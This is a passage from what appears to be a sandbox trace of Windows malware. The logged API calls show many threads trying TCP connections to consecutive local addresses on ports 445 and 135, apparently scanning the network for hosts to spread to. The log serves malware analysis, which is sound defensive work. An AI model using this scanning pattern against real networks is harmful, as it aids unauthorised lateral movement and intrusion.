(s=0x1048) returned 0 [0097.101] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0097.101] htons (hostshort=0x87) returned 0x8700 [0097.101] socket (af=2, type=1, protocol=6) returned 0x1048 [0097.101] ioctlsocket (in: s=0x1048, cmd=-2147195266, argp=0x131eff34 | out: argp=0x131eff34) returned 0 [0097.101] connect (s=0x1048, name=0x131eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.59"), namelen=16) returned -1 [0097.102] WSAGetLastError () returned 10035 [0097.102] select (in: nfds=0, readfds=0x0, writefds=0x131efd08, exceptfds=0x131efe10, timeout=0x131eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x131efd08, exceptfds=0x131efe10) returned 0 [0102.137] closesocket (s=0x1048) returned 0 [0102.137] RtlExitUserThread (Status=0x0) Thread: id = 254 os_tid = 0xde4 [0091.649] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20725c0 [0091.649] free (_Block=0x20725c0) [0091.649] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0091.649] htons (hostshort=0x1bd) returned 0xbd01 [0091.649] socket (af=2, type=1, protocol=6) returned 0x1054 [0091.649] ioctlsocket (in: s=0x1054, cmd=-2147195266, argp=0x1332ff34 | out: argp=0x1332ff34) returned 0 [0091.649] connect (s=0x1054, name=0x1332ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.58"), namelen=16) returned -1 [0091.650] WSAGetLastError () returned 10035 [0091.650] select (in: nfds=0, readfds=0x0, writefds=0x1332fd08, exceptfds=0x1332fe10, timeout=0x1332ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1332fd08, exceptfds=0x1332fe10) returned 0 [0097.099] closesocket (s=0x1054) returned 0 [0097.100] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0097.100] htons (hostshort=0x87) returned 0x8700 [0097.100] socket (af=2, type=1, protocol=6) returned 0x1054 [0097.100] ioctlsocket (in: s=0x1054, cmd=-2147195266, argp=0x1332ff34 | out: argp=0x1332ff34) returned 0 [0097.100] connect (s=0x1054, name=0x1332ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.58"), namelen=16) returned -1 [0097.100] WSAGetLastError () returned 10035 [0097.100] select (in: nfds=0, readfds=0x0, writefds=0x1332fd08, exceptfds=0x1332fe10, timeout=0x1332ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1332fd08, exceptfds=0x1332fe10) returned 0 [0102.104] closesocket (s=0x1054) returned 0 [0102.105] RtlExitUserThread (Status=0x0) Thread: id = 255 os_tid = 0xde8 [0091.650] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072598 [0091.650] free (_Block=0x2072598) [0091.650] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0091.650] htons (hostshort=0x1bd) returned 0xbd01 [0091.650] socket (af=2, type=1, protocol=6) returned 0x1060 [0091.651] ioctlsocket (in: s=0x1060, cmd=-2147195266, argp=0x1346ff34 | out: argp=0x1346ff34) returned 0 [0091.651] connect (s=0x1060, name=0x1346ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.57"), namelen=16) returned -1 [0091.651] WSAGetLastError () returned 10035 [0091.651] select (in: nfds=0, readfds=0x0, writefds=0x1346fd08, exceptfds=0x1346fe10, timeout=0x1346ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1346fd08, exceptfds=0x1346fe10) returned 0 [0097.098] closesocket (s=0x1060) returned 0 [0097.098] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0097.098] htons (hostshort=0x87) returned 0x8700 [0097.098] socket (af=2, type=1, protocol=6) returned 0x1060 [0097.099] ioctlsocket (in: s=0x1060, cmd=-2147195266, argp=0x1346ff34 | out: argp=0x1346ff34) returned 0 [0097.099] connect (s=0x1060, name=0x1346ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.57"), namelen=16) returned -1 [0097.099] WSAGetLastError () returned 10035 [0097.099] select (in: nfds=0, readfds=0x0, writefds=0x1346fd08, exceptfds=0x1346fe10, timeout=0x1346ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1346fd08, exceptfds=0x1346fe10) returned 0 [0102.106] closesocket (s=0x1060) returned 0 [0102.106] RtlExitUserThread (Status=0x0) Thread: id = 256 os_tid = 0xdec [0091.652] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072570 [0091.652] free (_Block=0x2072570) [0091.652] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0091.652] htons (hostshort=0x1bd) returned 0xbd01 [0091.652] socket (af=2, type=1, protocol=6) returned 0x106c [0091.652] ioctlsocket (in: s=0x106c, cmd=-2147195266, argp=0x135aff34 | out: argp=0x135aff34) returned 0 [0091.652] connect (s=0x106c, name=0x135aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.56"), namelen=16) returned -1 [0091.653] WSAGetLastError () returned 10035 [0091.653] select (in: nfds=0, readfds=0x0, writefds=0x135afd08, exceptfds=0x135afe10, timeout=0x135aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x135afd08, exceptfds=0x135afe10) returned 0 [0097.097] closesocket (s=0x106c) returned 0 [0097.097] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0097.097] htons (hostshort=0x87) returned 0x8700 [0097.097] socket (af=2, type=1, protocol=6) returned 0x106c [0097.097] ioctlsocket (in: s=0x106c, cmd=-2147195266, argp=0x135aff34 | out: argp=0x135aff34) returned 0 [0097.097] connect (s=0x106c, name=0x135aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.56"), namelen=16) returned -1 [0097.098] WSAGetLastError () returned 10035 [0097.098] select (in: nfds=0, readfds=0x0, writefds=0x135afd08, exceptfds=0x135afe10, timeout=0x135aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x135afd08, exceptfds=0x135afe10) returned 0 [0102.107] closesocket (s=0x106c) returned 0 [0102.108] RtlExitUserThread (Status=0x0) Thread: id = 257 os_tid = 0xdf0 [0091.656] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072548 [0091.656] free (_Block=0x2072548) [0091.657] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0091.657] htons (hostshort=0x1bd) returned 0xbd01 [0091.657] socket (af=2, type=1, protocol=6) returned 0x1078 [0091.657] ioctlsocket (in: s=0x1078, cmd=-2147195266, argp=0x136eff34 | out: argp=0x136eff34) returned 0 [0091.657] connect (s=0x1078, name=0x136eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.55"), namelen=16) returned -1 [0091.658] WSAGetLastError () returned 10035 [0091.658] select (in: nfds=0, readfds=0x0, writefds=0x136efd08, exceptfds=0x136efe10, timeout=0x136eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x136efd08, exceptfds=0x136efe10) returned 0 [0097.114] closesocket (s=0x1078) returned 0 [0097.114] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0097.114] htons (hostshort=0x87) returned 0x8700 [0097.114] socket (af=2, type=1, protocol=6) returned 0x1078 [0097.114] ioctlsocket (in: s=0x1078, cmd=-2147195266, argp=0x136eff34 | out: argp=0x136eff34) returned 0 [0097.114] connect (s=0x1078, name=0x136eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.55"), namelen=16) returned -1 [0097.115] WSAGetLastError () returned 10035 [0097.115] select (in: nfds=0, readfds=0x0, writefds=0x136efd08, exceptfds=0x136efe10, timeout=0x136eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x136efd08, exceptfds=0x136efe10) returned 0 [0102.161] closesocket (s=0x1078) returned 0 [0102.161] RtlExitUserThread (Status=0x0) Thread: id = 258 os_tid = 0xdf4 [0091.658] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072520 [0091.658] free (_Block=0x2072520) [0091.658] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0091.658] htons (hostshort=0x1bd) returned 0xbd01 [0091.658] socket (af=2, type=1, protocol=6) returned 0x1084 [0091.658] ioctlsocket (in: s=0x1084, cmd=-2147195266, argp=0x1382ff34 | out: argp=0x1382ff34) returned 0 [0091.658] connect (s=0x1084, name=0x1382ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.54"), namelen=16) returned -1 [0091.659] WSAGetLastError () returned 10035 [0091.659] select (in: nfds=0, readfds=0x0, writefds=0x1382fd08, exceptfds=0x1382fe10, timeout=0x1382ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1382fd08, exceptfds=0x1382fe10) returned 0 [0097.112] closesocket (s=0x1084) returned 0 [0097.113] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0097.113] htons (hostshort=0x87) returned 0x8700 [0097.113] socket (af=2, type=1, protocol=6) returned 0x1084 [0097.113] ioctlsocket (in: s=0x1084, cmd=-2147195266, argp=0x1382ff34 | out: argp=0x1382ff34) returned 0 [0097.113] connect (s=0x1084, name=0x1382ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.54"), namelen=16) returned -1 [0097.113] WSAGetLastError () returned 10035 [0097.113] select (in: nfds=0, readfds=0x0, writefds=0x1382fd08, exceptfds=0x1382fe10, timeout=0x1382ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1382fd08, exceptfds=0x1382fe10) returned 0 [0102.159] closesocket (s=0x1084) returned 0 [0102.160] RtlExitUserThread (Status=0x0) Thread: id = 259 os_tid = 0xdf8 [0091.659] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20724f8 [0091.660] free (_Block=0x20724f8) [0091.660] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0091.660] htons (hostshort=0x1bd) returned 0xbd01 [0091.660] socket (af=2, type=1, protocol=6) returned 0x1090 [0091.662] ioctlsocket (in: s=0x1090, cmd=-2147195266, argp=0x1396ff34 | out: argp=0x1396ff34) returned 0 [0091.662] connect (s=0x1090, name=0x1396ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.53"), namelen=16) returned -1 [0091.663] WSAGetLastError () returned 10035 [0091.663] select (in: nfds=0, readfds=0x0, writefds=0x1396fd08, exceptfds=0x1396fe10, timeout=0x1396ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1396fd08, exceptfds=0x1396fe10) returned 0 [0097.111] closesocket (s=0x1090) returned 0 [0097.111] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0097.112] htons (hostshort=0x87) returned 0x8700 [0097.112] socket (af=2, type=1, protocol=6) returned 0x1090 [0097.112] ioctlsocket (in: s=0x1090, cmd=-2147195266, argp=0x1396ff34 | out: argp=0x1396ff34) returned 0 [0097.112] connect (s=0x1090, name=0x1396ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.53"), namelen=16) returned -1 [0097.112] WSAGetLastError () returned 10035 [0097.112] select (in: nfds=0, readfds=0x0, writefds=0x1396fd08, exceptfds=0x1396fe10, timeout=0x1396ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1396fd08, exceptfds=0x1396fe10) returned 0 [0102.157] closesocket (s=0x1090) returned 0 [0102.158] RtlExitUserThread (Status=0x0) Thread: id = 260 os_tid = 0xdfc [0091.663] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20724d0 [0091.663] free (_Block=0x20724d0) [0091.663] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0091.663] htons (hostshort=0x1bd) returned 0xbd01 [0091.663] socket (af=2, type=1, protocol=6) returned 0x109c [0091.663] ioctlsocket (in: s=0x109c, cmd=-2147195266, argp=0x13aaff34 | out: argp=0x13aaff34) returned 0 [0091.664] connect (s=0x109c, name=0x13aaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.52"), namelen=16) returned -1 [0091.664] WSAGetLastError () returned 10035 [0091.664] select (in: nfds=0, readfds=0x0, writefds=0x13aafd08, exceptfds=0x13aafe10, timeout=0x13aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13aafd08, exceptfds=0x13aafe10) returned 0 [0097.110] closesocket (s=0x109c) returned 0 [0097.110] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0097.110] htons (hostshort=0x87) returned 0x8700 [0097.110] socket (af=2, type=1, protocol=6) returned 0x109c [0097.111] ioctlsocket (in: s=0x109c, cmd=-2147195266, argp=0x13aaff34 | out: argp=0x13aaff34) returned 0 [0097.111] connect (s=0x109c, name=0x13aaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.52"), namelen=16) returned -1 [0097.111] WSAGetLastError () returned 10035 [0097.111] select (in: nfds=0, readfds=0x0, writefds=0x13aafd08, exceptfds=0x13aafe10, timeout=0x13aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13aafd08, exceptfds=0x13aafe10) returned 0 [0102.155] closesocket (s=0x109c) returned 0 [0102.156] RtlExitUserThread (Status=0x0) Thread: id = 261 os_tid = 0xe00 [0091.664] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20724a8 [0091.664] free (_Block=0x20724a8) [0091.664] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0091.664] htons (hostshort=0x1bd) returned 0xbd01 [0091.665] socket (af=2, type=1, protocol=6) returned 0x10a8 [0091.665] ioctlsocket (in: s=0x10a8, cmd=-2147195266, argp=0x13beff34 | out: argp=0x13beff34) returned 0 [0091.665] connect (s=0x10a8, name=0x13beff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.51"), namelen=16) returned -1 [0091.666] WSAGetLastError () returned 10035 [0091.666] select (in: nfds=0, readfds=0x0, writefds=0x13befd08, exceptfds=0x13befe10, timeout=0x13beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13befd08, exceptfds=0x13befe10) returned 0 [0097.109] closesocket (s=0x10a8) returned 0 [0097.109] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0097.109] htons (hostshort=0x87) returned 0x8700 [0097.109] socket (af=2, type=1, protocol=6) returned 0x10a8 [0097.109] ioctlsocket (in: s=0x10a8, cmd=-2147195266, argp=0x13beff34 | out: argp=0x13beff34) returned 0 [0097.109] connect (s=0x10a8, name=0x13beff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.51"), namelen=16) returned -1 [0097.110] WSAGetLastError () returned 10035 [0097.110] select (in: nfds=0, readfds=0x0, writefds=0x13befd08, exceptfds=0x13befe10, timeout=0x13beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13befd08, exceptfds=0x13befe10) returned 0 [0102.154] closesocket (s=0x10a8) returned 0 [0102.154] RtlExitUserThread (Status=0x0) Thread: id = 262 os_tid = 0xe04 [0091.666] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072480 [0091.666] free (_Block=0x2072480) [0091.666] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0091.666] htons (hostshort=0x1bd) returned 0xbd01 [0091.666] socket (af=2, type=1, protocol=6) returned 0x10b4 [0091.666] ioctlsocket (in: s=0x10b4, cmd=-2147195266, argp=0x13d2ff34 | out: argp=0x13d2ff34) returned 0 [0091.667] connect (s=0x10b4, name=0x13d2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.50"), namelen=16) returned -1 [0091.667] WSAGetLastError () returned 10035 [0091.667] select (in: nfds=0, readfds=0x0, writefds=0x13d2fd08, exceptfds=0x13d2fe10, timeout=0x13d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13d2fd08, exceptfds=0x13d2fe10) returned 0 [0097.107] closesocket (s=0x10b4) returned 0 [0097.108] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0097.108] htons (hostshort=0x87) returned 0x8700 [0097.108] socket (af=2, type=1, protocol=6) returned 0x10b4 [0097.108] ioctlsocket (in: s=0x10b4, cmd=-2147195266, argp=0x13d2ff34 | out: argp=0x13d2ff34) returned 0 [0097.108] connect (s=0x10b4, name=0x13d2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.50"), namelen=16) returned -1 [0097.108] WSAGetLastError () returned 10035 [0097.108] select (in: nfds=0, readfds=0x0, writefds=0x13d2fd08, exceptfds=0x13d2fe10, timeout=0x13d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13d2fd08, exceptfds=0x13d2fe10) returned 0 [0102.152] closesocket (s=0x10b4) returned 0 [0102.153] RtlExitUserThread (Status=0x0) Thread: id = 263 os_tid = 0xe08 [0091.668] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072458 [0091.668] free (_Block=0x2072458) [0091.668] inet_addr (cp="192.168.0.49") returned 0x3100a8c0 [0091.668] htons (hostshort=0x1bd) returned 0xbd01 [0091.668] socket (af=2, type=1, protocol=6) returned 0x10c0 [0091.668] ioctlsocket (in: s=0x10c0, cmd=-2147195266, argp=0x13e6ff34 | out: argp=0x13e6ff34) returned 0 [0091.668] connect (s=0x10c0, name=0x13e6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.49"), namelen=16) returned -1 [0091.669] WSAGetLastError () returned 10035 [0091.669] select (in: nfds=0, readfds=0x0, writefds=0x13e6fd08, exceptfds=0x13e6fe10, timeout=0x13e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13e6fd08, exceptfds=0x13e6fe10) returned 0 [0097.106] closesocket (s=0x10c0) returned 0 [0097.107] inet_addr (cp="192.168.0.49") returned 0x3100a8c0 [0097.107] htons (hostshort=0x87) returned 0x8700 [0097.107] socket (af=2, type=1, protocol=6) returned 0x10c0 [0097.107] ioctlsocket (in: s=0x10c0, cmd=-2147195266, argp=0x13e6ff34 | out: argp=0x13e6ff34) returned 0 [0097.107] connect (s=0x10c0, name=0x13e6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.49"), namelen=16) returned -1 [0097.107] WSAGetLastError () returned 10035 [0097.107] select (in: nfds=0, readfds=0x0, writefds=0x13e6fd08, exceptfds=0x13e6fe10, timeout=0x13e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13e6fd08, exceptfds=0x13e6fe10) returned 0 [0102.149] closesocket (s=0x10c0) returned 0 [0102.151] RtlExitUserThread (Status=0x0) Thread: id = 264 os_tid = 0xe0c [0091.669] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072430 [0091.669] free (_Block=0x2072430) [0091.669] inet_addr (cp="192.168.0.48") returned 0x3000a8c0 [0091.670] htons (hostshort=0x1bd) returned 0xbd01 [0091.670] socket (af=2, type=1, protocol=6) returned 0x10cc [0091.670] ioctlsocket (in: s=0x10cc, cmd=-2147195266, argp=0x13faff34 | out: argp=0x13faff34) returned 0 [0091.670] connect (s=0x10cc, name=0x13faff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.48"), namelen=16) returned -1 [0091.673] WSAGetLastError () returned 10035 [0091.673] select (in: nfds=0, readfds=0x0, writefds=0x13fafd08, exceptfds=0x13fafe10, timeout=0x13faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13fafd08, exceptfds=0x13fafe10) returned 0 [0097.115] closesocket (s=0x10cc) returned 0 [0097.115] inet_addr (cp="192.168.0.48") returned 0x3000a8c0 [0097.115] htons (hostshort=0x87) returned 0x8700 [0097.115] socket (af=2, type=1, protocol=6) returned 0x10cc [0097.115] ioctlsocket (in: s=0x10cc, cmd=-2147195266, argp=0x13faff34 | out: argp=0x13faff34) returned 0 [0097.116] connect (s=0x10cc, name=0x13faff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.48"), namelen=16) returned -1 [0097.116] WSAGetLastError () returned 10035 [0097.116] select (in: nfds=0, readfds=0x0, writefds=0x13fafd08, exceptfds=0x13fafe10, timeout=0x13faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x13fafd08, exceptfds=0x13fafe10) returned 0 [0102.168] closesocket (s=0x10cc) returned 0 [0102.169] RtlExitUserThread (Status=0x0) Thread: id = 265 os_tid = 0xe14 Thread: id = 266 os_tid = 0xe10 [0091.899] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072408 [0091.899] free (_Block=0x2072408) [0091.900] inet_addr (cp="192.168.0.47") returned 0x2f00a8c0 [0091.900] htons (hostshort=0x1bd) returned 0xbd01 [0091.900] socket (af=2, type=1, protocol=6) returned 0x4b4 [0091.902] ioctlsocket (in: s=0x4b4, cmd=-2147195266, argp=0x140eff34 | out: argp=0x140eff34) returned 0 [0091.902] connect (s=0x4b4, name=0x140eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.47"), namelen=16) returned -1 [0091.904] WSAGetLastError () returned 10035 [0091.904] select (in: nfds=0, readfds=0x0, writefds=0x140efd08, exceptfds=0x140efe10, timeout=0x140eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x140efd08, exceptfds=0x140efe10) returned 0 [0097.120] closesocket (s=0x4b4) returned 0 [0097.120] inet_addr (cp="192.168.0.47") returned 0x2f00a8c0 [0097.120] htons (hostshort=0x87) returned 0x8700 [0097.120] socket (af=2, type=1, protocol=6) returned 0x4b4 [0097.120] ioctlsocket (in: s=0x4b4, cmd=-2147195266, argp=0x140eff34 | out: argp=0x140eff34) returned 0 [0097.121] connect (s=0x4b4, name=0x140eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.47"), namelen=16) returned -1 [0097.121] WSAGetLastError () returned 10035 [0097.121] select (in: nfds=0, readfds=0x0, writefds=0x140efd08, exceptfds=0x140efe10, timeout=0x140eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x140efd08, exceptfds=0x140efe10) returned 0 [0102.170] closesocket (s=0x4b4) returned 0 [0102.171] RtlExitUserThread (Status=0x0) Thread: id = 267 os_tid = 0xe18 [0091.905] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20723e0 [0091.905] free (_Block=0x20723e0) [0091.905] inet_addr (cp="192.168.0.46") returned 0x2e00a8c0 [0091.905] htons (hostshort=0x1bd) returned 0xbd01 [0091.905] socket (af=2, type=1, protocol=6) returned 0x11ac [0091.905] ioctlsocket (in: s=0x11ac, cmd=-2147195266, argp=0x143bff34 | out: argp=0x143bff34) returned 0 [0091.905] connect (s=0x11ac, name=0x143bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.46"), namelen=16) returned -1 [0091.906] WSAGetLastError () returned 10035 [0091.906] select (in: nfds=0, readfds=0x0, writefds=0x143bfd08, exceptfds=0x143bfe10, timeout=0x143bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x143bfd08, exceptfds=0x143bfe10) returned 0 [0097.131] closesocket (s=0x11ac) returned 0 [0097.131] inet_addr (cp="192.168.0.46") returned 0x2e00a8c0 [0097.131] htons (hostshort=0x87) returned 0x8700 [0097.131] socket (af=2, type=1, protocol=6) returned 0x11ac [0097.132] ioctlsocket (in: s=0x11ac, cmd=-2147195266, argp=0x143bff34 | out: argp=0x143bff34) returned 0 [0097.132] connect (s=0x11ac, name=0x143bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.46"), namelen=16) returned -1 [0097.132] WSAGetLastError () returned 10035 [0097.132] select (in: nfds=0, readfds=0x0, writefds=0x143bfd08, exceptfds=0x143bfe10, timeout=0x143bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x143bfd08, exceptfds=0x143bfe10) returned 0 [0102.214] closesocket (s=0x11ac) returned 0 [0102.214] RtlExitUserThread (Status=0x0) Thread: id = 268 os_tid = 0xe1c [0091.906] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20723b8 [0091.906] free (_Block=0x20723b8) [0091.906] inet_addr (cp="192.168.0.45") returned 0x2d00a8c0 [0091.906] htons (hostshort=0x1bd) returned 0xbd01 [0091.906] socket (af=2, type=1, protocol=6) returned 0x11b8 [0091.907] ioctlsocket (in: s=0x11b8, cmd=-2147195266, argp=0x144fff34 | out: argp=0x144fff34) returned 0 [0091.907] connect (s=0x11b8, name=0x144fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.45"), namelen=16) returned -1 [0091.907] WSAGetLastError () returned 10035 [0091.907] select (in: nfds=0, readfds=0x0, writefds=0x144ffd08, exceptfds=0x144ffe10, timeout=0x144fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x144ffd08, exceptfds=0x144ffe10) returned 0 [0097.129] closesocket (s=0x11b8) returned 0 [0097.130] inet_addr (cp="192.168.0.45") returned 0x2d00a8c0 [0097.130] htons (hostshort=0x87) returned 0x8700 [0097.130] socket (af=2, type=1, protocol=6) returned 0x11b8 [0097.130] ioctlsocket (in: s=0x11b8, cmd=-2147195266, argp=0x144fff34 | out: argp=0x144fff34) returned 0 [0097.130] connect (s=0x11b8, name=0x144fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.45"), namelen=16) returned -1 [0097.130] WSAGetLastError () returned 10035 [0097.131] select (in: nfds=0, readfds=0x0, writefds=0x144ffd08, exceptfds=0x144ffe10, timeout=0x144fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x144ffd08, exceptfds=0x144ffe10) returned 0 [0102.183] closesocket (s=0x11b8) returned 0 [0102.184] RtlExitUserThread (Status=0x0) Thread: id = 269 os_tid = 0xe20 [0091.908] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072390 [0091.908] free (_Block=0x2072390) [0091.908] inet_addr (cp="192.168.0.44") returned 0x2c00a8c0 [0091.908] htons (hostshort=0x1bd) returned 0xbd01 [0091.908] socket (af=2, type=1, protocol=6) returned 0x11c4 [0091.908] ioctlsocket (in: s=0x11c4, cmd=-2147195266, argp=0x1463ff34 | out: argp=0x1463ff34) returned 0 [0091.908] connect (s=0x11c4, name=0x1463ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.44"), namelen=16) returned -1 [0091.909] WSAGetLastError () returned 10035 [0091.909] select (in: nfds=0, readfds=0x0, writefds=0x1463fd08, exceptfds=0x1463fe10, timeout=0x1463ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1463fd08, exceptfds=0x1463fe10) returned 0 [0097.128] closesocket (s=0x11c4) returned 0 [0097.129] inet_addr (cp="192.168.0.44") returned 0x2c00a8c0 [0097.129] htons (hostshort=0x87) returned 0x8700 [0097.129] socket (af=2, type=1, protocol=6) returned 0x11c4 [0097.129] ioctlsocket (in: s=0x11c4, cmd=-2147195266, argp=0x1463ff34 | out: argp=0x1463ff34) returned 0 [0097.129] connect (s=0x11c4, name=0x1463ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.44"), namelen=16) returned -1 [0097.129] WSAGetLastError () returned 10035 [0097.129] select (in: nfds=0, readfds=0x0, writefds=0x1463fd08, exceptfds=0x1463fe10, timeout=0x1463ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1463fd08, exceptfds=0x1463fe10) returned 0 [0102.182] closesocket (s=0x11c4) returned 0 [0102.182] RtlExitUserThread (Status=0x0) Thread: id = 270 os_tid = 0xe24 [0091.910] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072368 [0091.910] free (_Block=0x2072368) [0091.910] inet_addr (cp="192.168.0.43") returned 0x2b00a8c0 [0091.910] htons (hostshort=0x1bd) returned 0xbd01 [0091.910] socket (af=2, type=1, protocol=6) returned 0x11d0 [0091.910] ioctlsocket (in: s=0x11d0, cmd=-2147195266, argp=0x1477ff34 | out: argp=0x1477ff34) returned 0 [0091.910] connect (s=0x11d0, name=0x1477ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.43"), namelen=16) returned -1 [0091.911] WSAGetLastError () returned 10035 [0091.911] select (in: nfds=0, readfds=0x0, writefds=0x1477fd08, exceptfds=0x1477fe10, timeout=0x1477ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1477fd08, exceptfds=0x1477fe10) returned 0 [0097.127] closesocket (s=0x11d0) returned 0 [0097.128] inet_addr (cp="192.168.0.43") returned 0x2b00a8c0 [0097.128] htons (hostshort=0x87) returned 0x8700 [0097.128] socket (af=2, type=1, protocol=6) returned 0x11d0 [0097.128] ioctlsocket (in: s=0x11d0, cmd=-2147195266, argp=0x1477ff34 | out: argp=0x1477ff34) returned 0 [0097.128] connect (s=0x11d0, name=0x1477ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.43"), namelen=16) returned -1 [0097.128] WSAGetLastError () returned 10035 [0097.128] select (in: nfds=0, readfds=0x0, writefds=0x1477fd08, exceptfds=0x1477fe10, timeout=0x1477ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, 